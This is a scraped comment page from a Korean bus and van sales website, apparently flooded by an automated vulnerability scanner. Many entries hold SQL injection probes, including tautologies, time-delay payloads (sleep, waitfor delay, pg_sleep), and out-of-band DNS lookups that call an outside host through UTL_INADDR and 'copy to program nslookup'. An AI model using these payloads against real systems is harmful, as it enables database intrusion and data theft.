버스/승합차 직거래 사이트! 버스4989 에 오신 것을 환영합니다.

아이디

비밀번호

 

 

 

 

 

 

글  쓴  이

   

조  회  수

제       목

   

등  록  일

70/01/01

 

 

IP Address :

 

 

* 등록자 : 유재동   등록일: 2014-04-09 15:25:48   

15회로재등록신청

 

* 등록자 : 1   등록일: 2020-03-05 18:44:52   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:52   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:53   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:53   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:53   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:54   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:54   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:54   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:54   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:55   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:58   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:58   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:58   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:59   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:59   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:44:59   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:00   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:33   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:33   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:33   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:34   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:34   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:34   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:34   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:35   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:35   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:35   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:35   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:36   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:36   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:36   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:36   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:37   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:45:37   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:46:26   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:46:27   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:46:27   

-1 OR 2+256-256-1=0+0+0+1 --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:27   

-1 OR 2+742-742-1=0+0+0+1

 

* 등록자 : 1   등록일: 2020-03-05 18:46:27   

-1' OR 2+148-148-1=0+0+0+1 --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:28   

-1' OR 2+603-603-1=0+0+0+1 or 'fGKHIW8B'='

 

* 등록자 : 1   등록일: 2020-03-05 18:46:28   

-1" OR 2+77-77-1=0+0+0+1 --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:28   

if(now()=sysdate(),sleep(16),0)/*'XOR(if(now()=sysdate(),sleep(16),0))OR'"XOR(if(now()=sysdate(),sleep(16),0))OR"*/

 

* 등록자 : 1   등록일: 2020-03-05 18:46:28   

(select(0)from(select(sleep(24)))v)/*'+(select(0)from(select(sleep(24)))v)+'"+(select(0)from(select(sleep(24)))v)+"*/

 

* 등록자 : 1   등록일: 2020-03-05 18:46:29   

-1; waitfor delay '0:0:24' --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:29   

-1); waitfor delay '0:0:24' --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:29   

1 waitfor delay '0:0:8' --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:29   

U4argssE'; waitfor delay '0:0:8' --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:30   

-1;select pg_sleep(8); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:30   

-1);select pg_sleep(8); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:30   

-1));select pg_sleep(8); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:30   

0EpE6N3U';select pg_sleep(16); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:31   

WcQ8zNb4');select pg_sleep(16); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:31   

rkEc4iA7'));select pg_sleep(16); --

 

* 등록자 : 1   등록일: 2020-03-05 18:46:31   

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.1585-1230.1585.b04ac.1.bxss'||'.me')

 

* 등록자 : 1   등록일: 2020-03-05 18:46:31   

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.1585-1232.1585.b04ac.1.bxss'||'.me')||'

 

* 등록자 : 1   등록일: 2020-03-05 18:46:32   

1;copy (select '') to program 'nslookup dns.sqli.\013405.1585-1234.1585.b04ac.\1.bxss.me'

 

* 등록자 : 1   등록일: 2020-03-05 18:46:32   

1';copy (select '') to program 'nslookup dns.sqli.\013405.1585-1236.1585.b04ac.\1.bxss.me

 

* 등록자 : 1   등록일: 2020-03-05 18:46:32   

400'

 

* 등록자 : 1   등록일: 2020-03-05 18:47:46   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:47:46   

1

 

* 등록자 : -1 OR 2+526-526-1=0+   등록일: 2020-03-05 18:47:46   

1

 

* 등록자 : -1 OR 2+417-417-1=0+   등록일: 2020-03-05 18:47:47   

1

 

* 등록자 : -1' OR 2+383-383-1=0   등록일: 2020-03-05 18:47:47   

1

 

* 등록자 : -1' OR 2+943-943-1=0   등록일: 2020-03-05 18:47:50   

1

 

* 등록자 : -1" OR 2+619-619-1=0   등록일: 2020-03-05 18:47:50   

1

 

* 등록자 : if(now()=sysdate(),s   등록일: 2020-03-05 18:47:51   

1

 

* 등록자 : (select(0)from(selec   등록일: 2020-03-05 18:47:51   

1

 

* 등록자 : -1; waitfor delay '0   등록일: 2020-03-05 18:47:51   

1

 

* 등록자 : -1); waitfor delay '   등록일: 2020-03-05 18:47:51   

1

 

* 등록자 : 1 waitfor delay '0:0   등록일: 2020-03-05 18:47:52   

1

 

* 등록자 : 1cbn8sZm'; waitfor d   등록일: 2020-03-05 18:47:52   

1

 

* 등록자 : -1;select pg_sleep(2   등록일: 2020-03-05 18:47:52   

1

 

* 등록자 : -1);select pg_sleep(   등록일: 2020-03-05 18:47:52   

1

 

* 등록자 : -1));select pg_sleep   등록일: 2020-03-05 18:47:53   

1

 

* 등록자 : SQPj6fjp';select pg_   등록일: 2020-03-05 18:47:53   

1

 

* 등록자 : EKwSH6qa');select pg   등록일: 2020-03-05 18:47:53   

1

 

* 등록자 : yEv59SsP'));select p   등록일: 2020-03-05 18:47:53   

1

 

* 등록자 : 1||UTL_INADDR.get_ho   등록일: 2020-03-05 18:47:57   

1

 

* 등록자 : '||UTL_INADDR.get_ho   등록일: 2020-03-05 18:47:57   

1

 

* 등록자 : 1;copy (select '') t   등록일: 2020-03-05 18:47:57   

1

 

* 등록자 : 1';copy (select '')   등록일: 2020-03-05 18:47:57   

1

 

* 등록자 : 293'   등록일: 2020-03-05 18:47:58   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:49:55   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:49:55   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:07   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:08   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:08   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:08   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:08   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:09   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:09   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:09   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:10   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:10   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:10   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:10   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:11   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:11   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:11   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:11   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:12   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:12   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:12   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:51:14   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:13   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:14   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:14   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:14   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:14   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:15   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:29   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:29   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:29   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:29   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:30   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:30   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:30   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:30   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:54   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:52:55   

1'"

 

* 등록자 : 1   등록일: 2020-03-05 18:52:55   

\

 

* 등록자 : 1   등록일: 2020-03-05 18:52:55   

1위웬%2527%2522

 

* 등록자 : 1   등록일: 2020-03-05 18:52:55   

@@XdMxh

 

* 등록자 : 1   등록일: 2020-03-05 18:52:56   

JyI=

 

* 등록자 : 1   등록일: 2020-03-05 18:52:56   

'"

 

* 등록자 : 1   등록일: 2020-03-05 18:52:56   

''""

 

* 등록자 : 1   등록일: 2020-03-05 18:53:27   

1

 

* 등록자 : 1'"   등록일: 2020-03-05 18:53:27   

1

 

* 등록자 : \   등록일: 2020-03-05 18:53:27   

1

 

* 등록자 : 1위웬%2527%2522   등록일: 2020-03-05 18:53:28   

1

 

* 등록자 : @@zucok   등록일: 2020-03-05 18:53:28   

1

 

* 등록자 : JyI=   등록일: 2020-03-05 18:53:28   

1

 

* 등록자 : '"   등록일: 2020-03-05 18:53:28   

1

 

* 등록자 : ''""   등록일: 2020-03-05 18:53:29   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:20   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:45   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:45   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:46   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:46   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:46   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:47   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:47   

1

 

* 등록자 : 1   등록일: 2020-03-05 18:54:47   

1

 

 

 

 

 

 

글 목록보기

글쓰기


 

 

 

 

 

버스4989 소개 | 버스4989 광고안내 | 회원약관 | 개인정보취급방침 | 이메일무단수집거부 | 제휴문의 | 고객센터

 

소 재  / 상 호

:

인천광역시 남구 미추홀대로 637 2층 (우)22155  버스4989  / 대 표 : 조 호 경

관    리     자

:

조호선 과장  

버스4989 회원 이메일주소 무단수집거부

대  표  전  화

:

010-2556-4000

 FAX : 070-8259-2243  

TRUCKS@NATE.COM

소            개

:

버스4989는 인터넷 트럭직거래 및 검색사이트로써 트럭을 직접 매매하지 않습니다 

버스4989의 모든 이미지&제작기법은 저작권자 허락없이 무단 사용할 경우 저작권법에 의해 처벌됩니다.

COPYRIGHT BY  BUS4989.NET  &  버스4989    2006. 03   ALL RIGHT RESERVED